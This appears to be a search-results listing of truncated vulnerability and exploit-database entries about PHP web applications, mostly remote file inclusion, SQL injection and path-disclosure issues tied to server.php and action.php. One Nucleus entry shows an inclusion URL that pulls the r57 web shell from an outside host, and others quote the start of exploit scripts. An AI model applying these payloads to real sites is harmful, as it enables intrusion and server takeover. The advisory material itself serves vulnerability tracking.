Unfixed XSS vulnerability at phpxmlrpc.sourceforge.net

Security researcher lljkrieg, has submitted on 16/05/2011 a cross-site-scripting XSS vulnerability affecting phpxmlrpc.sourceforge.net, which at the time of submission ranked 154 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 11/12/2011. It is...

Nucleus v3.61 Multiple Remote File Include

Exploit for php platform in category web applications Nucleus v3.61 === Multiple Remote File Include By n0n0x Homepage: http://priasantai.uni.cc/ Download script :http://sourceforge.net/projects/nucleuscms/ ========================================= nucleus3.61/action.php?DIRLIBS=y0ur g4y...

Nucleus 3.61 - Multiple Remote File Inclusions

Nucleus 3.61 - Multiple Remote File Inclusions Nucleus v3.61 === Multiple Remote File Include By n0n0x Homepage: http://priasantai.uni.cc/ Download script :http://sourceforge.net/projects/nucleuscms/ ========================================= nucleus3.61/action.php?DIRLIBS=y0ur g4y...

FreeBSD Ports: lifetype

The remote host is missing an update to the system as announced in the referenced advisory. VID 116b0820-d59c-11da-8098-00123ffe8333 OpenVAS Vulnerability Test $ Description: Auto generated from vuxml or freebsd advisories Authors: Thomas Reinke Copyright: Copyright c 2008 E-Soft Inc...

BLOG:CMS 4.2.1.c (DIR_PLUGINS) Multiple Remote File Include

Name : BLOG:CMS 4.2.1.c DIRPLUGINS Multiple Remote File Include Download From : http://dfn.dl.sourceforge.net/sourceforge/blogcms/blogcms.4.2.1.c.7z Or Here http://blogcms.com Found By : RoMaNcYxHaCkEr We Are H-T TeaM Houssamix - ToXiC Home Page : Not Yet : Tryag.cc/cc No-Hack.net V99x.com/vb...

Design/Logic Flaw

PsychoStats 3.0.6b and earlier allows remote attackers to obtain sensitive information via a request for server.php with a missing or invalid newtheme parameter, which reveals a path in an error message...

PsychoStats 2.3 - 'Server.php' Full Path Disclosure

source: https://www.securityfocus.com/bid/24039/info PsychoStats is prone to a path-disclosure issue when invalid data is submitted. Exploiting this issue can allow an attacker to access sensitive data that may be used to launch further attacks against a vulnerable computer. PsychoStats 3.0.6b an...

PsychoStats 2.3 - Server.php Full Path Disclosure

PsychoStats 2.3 - Server.php Full Path Disclosure source: https://www.securityfocus.com/bid/24039/info PsychoStats is prone to a path-disclosure issue when invalid data is submitted. Exploiting this issue can allow an attacker to access sensitive data that may be used to launch further attacks...

Mambo Component Security Images 3.0.5 - Remote File Inclusion

Mambo Component Security Images 3.0.5 - Remote File Inclusion http://forge.joomla.org/sf/projects/comsecurityimages Marckusbest is the Best lamah of irc, fuck you comsecurityimages Mambo Remote File Include ------------------------------------------------------------------------------------ Bug...

Mambo Security Images Component <= 3.0.5 Inclusion Vulnerabilities

No description provided by source. http://forge.joomla.org/sf/projects/comsecurityimages Marckusbest is the Best lamah of irc, fuck you comsecurityimages Mambo Remote File Include ------------------------------------------------------------------------------------ Bug Found by: Drago84 greetz:...

file include exploits in nucleus 3.23

Multiple file include exploits in nucleus 3.23 script type : nucleus 3.23 bug found by : sweet-devil team : site-down type : file include exploits : action.php http://www.example.com/path/action.php?DIRLIBS=http://yoursite/r57shell.txt? media.php...

Bytehoard 2.1 - server.php Remote File Inclusion

Bytehoard 2.1 - server.php Remote File Inclusion Script: Bytehoard 2.1 Epsilon/Delta www.bytehoard.org Discovered: beford File: ./bytehoard/includes/webdav/server.php Vuln: Remote File Include code requireonce $bhconfig'bhfilepath'."/includes/webdav/parsepropfind.php"; /code...

Bytehoard 2.1 (server.php) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ============================================================ Bytehoard 2.1 server.php Remote File Include Vulnerability ============================================================ Script: Bytehoard 2.1 Epsilon/Delta www.bytehoard.org...

FreeBSD : lifetype -- ADOdb 'server.php' Insecure Test Script Security Issue (116b0820-d59c-11da-8098-00123ffe8333)

Secunia reports : A security issue has been discovered in LifeType, which can be exploited by malicious people to execute arbitrary SQL code and potentially compromise a vulnerable system. The problem is caused due to the presence of the insecure 'server.php' test script. %NASLMINLEVEL 70300 C...

FreeBSD : cacti -- ADOdb 'server.php' Insecure Test Script Security Issue (79c1154d-d5a5-11da-8098-00123ffe8333)

Secunia reports : Cacti have a security issue, which can be exploited by malicious people to execute arbitrary SQL code and potentially compromise a vulnerable system. The problem is caused due to the presence of the insecure 'server.php' test script. %NASLMINLEVEL 70300 C Tenable Network Securit...

lifetype -- ADOdb "server.php" Insecure Test Script Security Issue

Secunia reports: A security issue has been discovered in LifeType, which can be exploited by malicious people to execute arbitrary SQL code and potentially compromise a vulnerable system. The problem is caused due to the presence of the insecure "server.php" test script...

[SA19563] MAXdev MD-Pro ADOdb "server.php" Insecure Test Script Security Issue

TITLE: MAXdev MD-Pro ADOdb "server.php" Insecure Test Script Security Issue SECUNIA ADVISORY ID: SA19563 VERIFY ADVISORY: http://secunia.com/advisories/19563/ CRITICAL: Moderately critical IMPACT: Security Bypass, System access WHERE: From remote SOFTWARE: MAXdev MD-Pro 1.x...

ADODB 4.70 (PHPOpenChat 3.0.x) - Server.php SQL Injection

ADODB 4.70 PHPOpenChat 3.0.x - Server.php SQL Injection !/usr/bin/php -q -d shortopentag=on ? echo "PhpOpenChat 3.0.x ADODB Server.php "sql" SQL injection\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "dork: Welcome to your...

ADODB < 4.70 (PhpOpenChat 3.0.x) Server.php SQL Injection Exploit

Exploit for unknown platform in category web applications ================================================================= ADODB 4.70 PhpOpenChat 3.0.x Server.php SQL Injection Exploit ================================================================= !/usr/bin/php -q -d shortopentag=on ? echo...

phpRPC Library rpc_decoder.php decode() Function Arbitrary Code Execution

The remote host has installed on it the phpRPC library, an xmlrpc library written in PHP and bundled with applications such as RunCMS and exoops. The version of phpRPC on the remote host fails to sanitize user input to the 'server.php' script before using it in an 'eval' function, which may allow...